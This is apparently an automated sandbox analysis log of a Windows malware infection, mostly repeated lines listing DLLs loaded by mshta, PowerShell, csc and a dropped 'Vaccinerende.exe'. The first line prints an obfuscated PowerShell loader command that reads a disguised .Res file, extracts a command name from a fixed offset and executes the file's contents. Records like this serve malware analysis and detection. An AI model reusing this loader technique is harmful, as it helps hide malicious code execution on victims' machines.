          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: webio.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: shcore.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rstrtmgr.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
          Source: C:\Windows\SysWOW64\reg.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\reg.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: webio.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: shcore.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rstrtmgr.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: bcrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vcruntime140.dll
